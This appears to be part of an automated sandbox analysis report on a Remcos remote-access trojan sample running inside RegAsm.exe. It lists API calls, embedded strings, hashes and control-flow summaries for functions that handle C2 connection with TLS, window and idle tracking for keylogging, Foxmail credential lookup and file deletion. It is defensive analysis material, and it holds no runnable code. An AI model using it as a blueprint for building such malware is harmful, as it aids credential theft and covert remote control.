                                                                • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                APIs
                                                                • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                Strings
                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$EventLocalThreadTime
                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                • API String ID: 2532271599-1507639952
                                                                • Opcode ID: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                • Opcode Fuzzy Hash: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                APIs
                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,013DD540), ref: 004338DA
                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                • String ID:
                                                                • API String ID: 1815803762-0
                                                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                APIs
                                                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                                • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Name$ComputerUser
                                                                • String ID:
                                                                • API String ID: 4229901323-0
                                                                • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                APIs
                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID:
                                                                • API String ID: 2299586839-0
                                                                • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                                                                Control-flow Graph
                                                                • Entry block: 40ea00-40ea82 (graph rendering omitted; called APIs are listed under APIs below)
                                                                APIs
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                • String ID: 8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-I89M3S$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                • API String ID: 2830904901-2139572810
                                                                • Opcode ID: 1ef5b7d803f19f36c27cfa4c3c688568fcd5b6882c3006592bcd47f55126cf3d
                                                                • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                • Opcode Fuzzy Hash: 1ef5b7d803f19f36c27cfa4c3c688568fcd5b6882c3006592bcd47f55126cf3d
                                                                • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                                Control-flow Graph
                                                                • Entry block: 414f65-414fad (graph rendering omitted; called APIs are listed under APIs below)
                                                                APIs
                                                                • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                • String ID: | $%I64u$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$Rmc-I89M3S$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                • API String ID: 524882891-2075655159
                                                                • Opcode ID: 40e290f1c005af965ae0c338ba664b88dcf684986f60e650252d79466ad5e308
                                                                • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                • Opcode Fuzzy Hash: 40e290f1c005af965ae0c338ba664b88dcf684986f60e650252d79466ad5e308
                                                                • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                                Control-flow Graph
                                                                • Entry block: 412aef-412b38 (graph rendering omitted; called APIs are listed under APIs below)
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6BFB8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                • String ID: /stext "$0TG$0TG$NG$NG
                                                                • API String ID: 1223786279-2576077980
                                                                • Opcode ID: 55edfecb0d873be99d9e7b4341737605b4e58020463b7935fc33a56a4547f2ce
                                                                • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                • Opcode Fuzzy Hash: 55edfecb0d873be99d9e7b4341737605b4e58020463b7935fc33a56a4547f2ce
                                                                • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A

                                                                Control-flow Graph

                                                                APIs
                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                  • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                • String ID: )$Foxmail$ProgramFiles
                                                                • API String ID: 672098462-2938083778
                                                                • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                Control-flow Graph

                                                                APIs
                                                                • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                  • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                  • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                  • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                • API String ID: 3795512280-1152054767
                                                                • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E

                                                                 Control-flow Graph
                                                                 [Graph summary: entry block 4048c8-4048e8 calls connect. One branch (404a1b-404a2f) calls WSAGetLastError and then either exits at 404a97 or runs the blocks 404a36-404a94 (calls 41cb72, 4052fd, 402093, 41b580, 401fd8) before exiting. The other branch runs 4048fc-404923 (calls 40531e, 402093, 41b580), 404926-404930 (call 420cf1), 404941-40494e (call 420f20), 404987-404992 (call 421ad1) and 4049c4-4049d1 (call 420e97); from there 4049f9-404a14 calls CreateEventW twice and the function returns at 404a99-404a9e. The blocks 404932-40493c, 404950-404982 (call 420d31) and 404994-4049c2 (call 421143) reach the exit at 404a97 without creating the events.]
                                                                APIs
                                                                • connect.WS2_32(FFFFFFFF,013E6988,00000010), ref: 004048E0
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                • API String ID: 994465650-2151626615
                                                                • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                Control-flow Graph

                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                • String ID:
                                                                • API String ID: 3658366068-0
                                                                • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                Control-flow Graph

                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                • GetForegroundWindow.USER32 ref: 0040AD84
                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                                • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                • API String ID: 911427763-3954389425
                                                                • Opcode ID: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                • Opcode Fuzzy Hash: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

                                                                 Control-flow Graph
                                                                 [Graph summary: entry 40da6f-40da94 (call 401f86), then a multi-way branch at 40da9a into one of nine blocks between 40daa1 and 40dba9. Block 40dae0-40dae7 calls 41c048 (the GetCurrentProcess/IsWow64Process check whose subcall listing appears further down, with return address 0040DAE5 and the "WinDir" argument) and continues into either 40dae9-40db39 or 40db3b-40db87 (both call 40417e, 43c11f, 402fa5, 401f13, 401f09). All paths converge at 40dbbe-40dc56, which calls GetLongPathNameW.]
                                                                APIs
                                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LongNamePath
                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                • API String ID: 82841172-425784914
                                                                • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                 Control-flow Graph
